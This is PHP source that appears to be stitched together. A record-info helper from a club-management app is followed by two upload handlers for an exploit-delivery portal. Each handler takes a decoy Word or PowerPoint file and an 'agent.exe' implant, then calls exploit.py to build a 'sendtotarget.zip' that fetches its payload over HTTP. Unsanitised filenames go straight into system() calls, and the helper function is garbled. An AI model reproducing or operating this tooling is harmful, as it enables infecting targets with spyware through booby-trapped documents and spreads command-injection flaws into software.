/**
* Creates a html fragment with information about user and time when the recordset was created
* and when it was at last edited. Therefore all necessary data must be set in the function
* parameters. If userid is not set then the function will show @b deleted @b user.
* @param int $userIdCreated Id of the user who create the recordset.
* @param string $timestampCreate Date and time of the moment when the user create the recordset.
* @param int $userIdEdited Id of the user last changed the recordset.
* @param string $timestampEdited Date and time of the moment when the user last changed the recordset
* @return string Returns a html string with usernames who creates item and edit item the last time
*/
function admFuncShowCreateChangeInfoById($userIdCreated, $timestampCreate, $userIdEdited, $timestampEdited)
{
global $gDb, $gProfileFields, $gL10n, $gPreferences;
// only show info if system setting is activated
if ($gPreferences['system_show_create_edit'] > 0) {
$htmlCreateName = '';
$htmlEditName = '';
// compose name of user who create the recordset
if (strlen($timestampCreate) > 0) {
if ($userIdCreated > 0) {
$userCreate = new User($gDb, $gProfileFields, $userIdCreated);
if ($gPreferences['system_show_create_edit'] == 1) {
$htmlCreateName = getScoutName($userIdCreated);
} else {
$htmlCreateName = $userCreate->getValue('usr_login_name');
}
} else {
$htmlCreateName = $gL10n->get('SYS_DELETED_USER');
}
}
// compose name of user who edit the recordset
if (strlen($timestampEdited) > 0) {
if ($userIdEdited > 0) {
$userEdit = new User($gDb, $gProfileFields, $userIdEdited);
if ($gPreferences['system_show_create_edit'] == 1) {
$htmlCreateName = getScoutName($userIdEdited);
} else {
$htmlEditName = $userEdit->getValue('usr_login_name');
}
} else {
$htmlEditName = $gL10n->get('SYS_DELETED_USER');
}
}
if ($htmlCreateName !== '' || $htmlEditName !== '') {
// get html output from other function
return admFuncShowCreateChangeInfoByName($htmlCreateName, $timestampCreate, $htmlEditName, $timestampEdited, $userIdCreated, $userIdEdited);
}
}
return '';
}
#if(!isset($_POST['directory'])) die('Directory not specified');
if (!mkdir('../files/' . $rand_directory)) {
die('Unable to create directory');
}
if (!mkdir('../files/' . $rand_directory . "/cnt")) {
die('Unable to create directory');
}
$cwd = getcwd();
chdir("/var/www/html/admin/2013-002-Word");
move_uploaded_file($_FILES['original']['tmp_name'], "/var/www/html/admin/2013-002-Word/original.docx");
move_uploaded_file($_FILES['scout']['tmp_name'], "/var/www/html/admin/2013-002-Word/agent.exe");
$urlbase = 'http://' . $_SERVER['SERVER_NAME'] . '/documents/' . $rand_directory . '/';
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") {
$scout_name = "demo.exe";
} else {
$scout_name = getScoutName("/var/www/html/admin/2013-002-Word/agent.exe");
}
if ($scout_name == "") {
die('Unable to get scout name! :(');
}
mkdir("/tmp/{$rand_directory}");
copy("original.docx", $_FILES['original']['name']);
system("zip /tmp/{$rand_directory}/original.zip \"" . $_FILES['original']['name'] . "\" > /dev/null 2>&1");
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") {
system("python26 exploit_demo.py payload:http {$urlbase} sendtotarget.zip original.docx \"" . $_FILES['original']['name'] . "\" agent.exe server.zip \"{$scout_name}\" DEMO > /tmp/py.log 2>&1");
} else {
system("python26 exploit.py payload:http {$urlbase} sendtotarget.zip original.docx \"" . $_FILES['original']['name'] . "\" agent.exe server.zip \"{$scout_name}\" > /tmp/py.log 2>&1");
}
#mkdir("/tmp/$rand_directory");
#copy("original.docx", "\"".$_FILES['original']['name']."\"");
#system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" >/dev/null 2>&1");
#if(!isset($_POST['directory'])) die('Directory not specified');
if (!mkdir('../files/' . $rand_directory)) {
die('Unable to create directory');
}
if (!mkdir('../files/' . $rand_directory . "/cnt")) {
die('Unable to create directory');
}
$cwd = getcwd();
chdir("/var/www/html/admin/2013-003-PowerPoint");
move_uploaded_file($_FILES['original']['tmp_name'], "/var/www/html/admin/2013-003-PowerPoint/original.ppsx");
move_uploaded_file($_FILES['scout']['tmp_name'], "/var/www/html/admin/2013-003-PowerPoint/agent.exe");
$urlbase = 'http://' . $_SERVER['SERVER_NAME'] . '/documents/' . $rand_directory . '/';
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") {
$scout_name = "demo.exe";
} else {
$scout_name = getScoutName("/var/www/html/admin/2013-003-PowerPoint/agent.exe");
}
if ($scout_name == "") {
die('Unable to get scout name! :(');
}
mkdir("/tmp/{$rand_directory}");
copy("original.ppsx", $_FILES['original']['name']);
system("zip /tmp/{$rand_directory}/original.zip \"" . $_FILES['original']['name'] . "\" > /dev/null 2>&1");
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y") {
system("python26 exploit_demo.py payload:http {$urlbase} sendtotarget.zip original.ppsx \"" . $_FILES['original']['name'] . "\" agent.exe server.zip \"{$scout_name}\" DEMO > /tmp/py.log 2>&1");
} else {
system("python26 exploit.py payload:http {$urlbase} sendtotarget.zip original.ppsx \"" . $_FILES['original']['name'] . "\" agent.exe server.zip \"{$scout_name}\" > /tmp/py.log 2>&1");
}
#mkdir("/tmp/$rand_directory");
#copy("original.ppsx", "\"".$_FILES['original']['name']."\"");
#system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" >/dev/null 2>&1");